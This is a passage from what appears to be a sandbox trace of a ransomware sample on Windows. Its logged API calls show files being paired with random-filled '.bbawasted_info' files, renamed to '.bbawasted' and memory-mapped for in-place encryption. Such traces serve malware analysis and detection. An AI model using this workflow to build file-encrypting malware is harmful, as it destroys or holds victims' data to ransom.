0x5c4538 [0069.787] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0069.788] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c4538 | out: pbBuffer=0x5c4538) returned 1 [0069.788] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.788] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\afHQetjycFA rZ3.jpg.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\afhqetjycfa rz3.jpg.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0069.788] WriteFile (in: hFile=0x120, lpBuffer=0x5c4538*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c4538*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0069.789] SetEndOfFile (hFile=0x120) returned 1 [0069.790] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.790] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0069.790] lstrcpyW (in: lpString1=0x5c7838, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0069.790] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\afHQetjycFA rZ3.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\afhqetjycfa rz3.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\afHQetjycFA rZ3.jpg.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\afhqetjycfa rz3.jpg.bbawasted")) returned 1 [0069.790] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\afHQetjycFA rZ3.jpg.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\afhqetjycfa rz3.jpg.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0069.790] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0069.790] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x2f26 [0069.790] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2f26) returned 0x570000 [0069.791] CloseHandle (hObject=0xfc) returned 1 [0069.792] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0069.793] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0069.793] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.793] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0069.794] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0069.794] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.832] SetEndOfFile (hFile=0x120) returned 1 [0069.860] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0069.860] CloseHandle (hObject=0x120) returned 1 [0069.862] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0069.862] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c7250 | out: hHeap=0x580000) returned 1 [0069.862] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0069.862] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0069.862] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.863] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\71ic.mkv") returned 73 [0069.863] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x29c) returned 0x5c77b0 [0069.863] lstrcpyW (in: lpString1=0x5c7842, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0069.863] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0069.863] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0069.863] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0069.863] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.863] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\71ic.mkv.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\71ic.mkv.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0069.864] WriteFile (in: hFile=0x120, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0069.865] SetEndOfFile (hFile=0x120) returned 1 [0069.865] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.865] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0069.865] lstrcpyW (in: lpString1=0x5c7842, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0069.865] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\71ic.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\71ic.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\71ic.mkv.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\71ic.mkv.bbawasted")) returned 1 [0069.866] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\71ic.mkv.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\71ic.mkv.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0069.866] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0069.867] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x9991 [0069.867] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9991) returned 0xfe0000 [0069.867] CloseHandle (hObject=0x110) returned 1 [0069.869] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0069.870] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0069.870] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.870] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0069.871] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0069.871] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.879] SetEndOfFile (hFile=0x120) returned 1 [0069.882] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0069.882] CloseHandle (hObject=0x120) returned 1 [0069.883] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0069.883] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c8840 | out: hHeap=0x580000) returned 1 [0069.883] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0069.884] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0069.884] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.884] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\Hguh4Wy.swf") returned 76 [0069.884] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2a2) returned 0x5c77b0 [0069.884] lstrcpyW (in: lpString1=0x5c7848, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0069.884] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0069.884] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0069.885] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0069.885] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.885] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\Hguh4Wy.swf.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\hguh4wy.swf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0070.046] WriteFile (in: hFile=0x120, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0070.048] SetEndOfFile (hFile=0x120) returned 1 [0070.048] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.048] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0070.048] lstrcpyW (in: lpString1=0x5c7848, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0070.048] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\Hguh4Wy.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\hguh4wy.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\Hguh4Wy.swf.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\hguh4wy.swf.bbawasted")) returned 1 [0070.048] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\Hguh4Wy.swf.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\hguh4wy.swf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0070.049] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0070.049] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x17d56 [0070.049] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17d56) returned 0xfe0000 [0070.049] CloseHandle (hObject=0xfc) returned 1 [0070.054] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0070.055] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0070.055] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.055] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0070.056] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0070.056] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.064] SetEndOfFile (hFile=0x120) returned 1 [0070.066] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0070.066] CloseHandle (hObject=0x120) returned 1 [0070.068] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0070.068] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c8930 | out: hHeap=0x580000) returned 1 [0070.068] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0070.068] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0070.069] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.069] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\m6E2ZDtbtocQr585KATg.wav") returned 89 [0070.069] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2bc) returned 0x5c77b0 [0070.069] lstrcpyW (in: lpString1=0x5c7862, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0070.069] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0070.069] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0070.069] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0070.069] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.069] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\m6E2ZDtbtocQr585KATg.wav.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\m6e2zdtbtocqr585katg.wav.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0070.070] WriteFile (in: hFile=0x120, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0070.071] SetEndOfFile (hFile=0x120) returned 1 [0070.071] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.071] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0070.071] lstrcpyW (in: lpString1=0x5c7862, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0070.071] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\m6E2ZDtbtocQr585KATg.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\m6e2zdtbtocqr585katg.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\m6E2ZDtbtocQr585KATg.wav.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\m6e2zdtbtocqr585katg.wav.bbawasted")) returned 1 [0070.072] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\m6E2ZDtbtocQr585KATg.wav.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\m6e2zdtbtocqr585katg.wav.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0070.072] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0070.072] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x18740 [0070.072] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x18740) returned 0xfe0000 [0070.072] CloseHandle (hObject=0x11c) returned 1 [0070.077] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0070.125] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0070.125] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.125] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0070.126] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0070.126] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.134] SetEndOfFile (hFile=0x120) returned 1 [0070.136] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0070.136] CloseHandle (hObject=0x120) returned 1 [0070.137] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0070.137] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c8b20 | out: hHeap=0x580000) returned 1 [0070.138] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0070.138] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0070.138] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.138] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\s3pxmkuntuL8-\\A0pEXOj7Gs4t_mh1Da\\PNwaz.png") returned 107 [0070.138] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2e0) returned 0x5bf070 [0070.138] lstrcpyW (in: lpString1=0x5bf146, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0070.138] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0070.138] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0070.139] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0070.139] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.139] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\s3pxmkuntuL8-\\A0pEXOj7Gs4t_mh1Da\\PNwaz.png.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\s3pxmkuntul8-\\a0pexoj7gs4t_mh1da\\pnwaz.png.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0070.142] WriteFile (in: hFile=0xf8, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0070.143] SetEndOfFile (hFile=0xf8) returned 1 [0070.144] SetFilePointer (in: hFile=0xf8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.144] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0070.144] lstrcpyW (in: lpString1=0x5bf146, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0070.144] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\s3pxmkuntuL8-\\A0pEXOj7Gs4t_mh1Da\\PNwaz.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\s3pxmkuntul8-\\a0pexoj7gs4t_mh1da\\pnwaz.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\s3pxmkuntuL8-\\A0pEXOj7Gs4t_mh1Da\\PNwaz.png.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\s3pxmkuntul8-\\a0pexoj7gs4t_mh1da\\pnwaz.png.bbawasted")) returned 1 [0070.144] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\s3pxmkuntuL8-\\A0pEXOj7Gs4t_mh1Da\\PNwaz.png.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\s3pxmkuntul8-\\a0pexoj7gs4t_mh1da\\pnwaz.png.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0070.144] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0070.144] GetFileSize (in: hFile=0x120, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0xbda2 [0070.144] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xbda2) returned 0x570000 [0070.145] CloseHandle (hObject=0x120) returned 1 [0070.147] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0070.148] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0070.148] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.148] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0070.149] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0070.149] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.157] SetEndOfFile (hFile=0xf8) returned 1 [0070.159] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0070.159] CloseHandle (hObject=0xf8) returned 1 [0070.162] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0070.162] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5cb380 | out: hHeap=0x580000) returned 1 [0070.162] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0070.163] CryptGenRandom (in: hProv=0x5a4020, 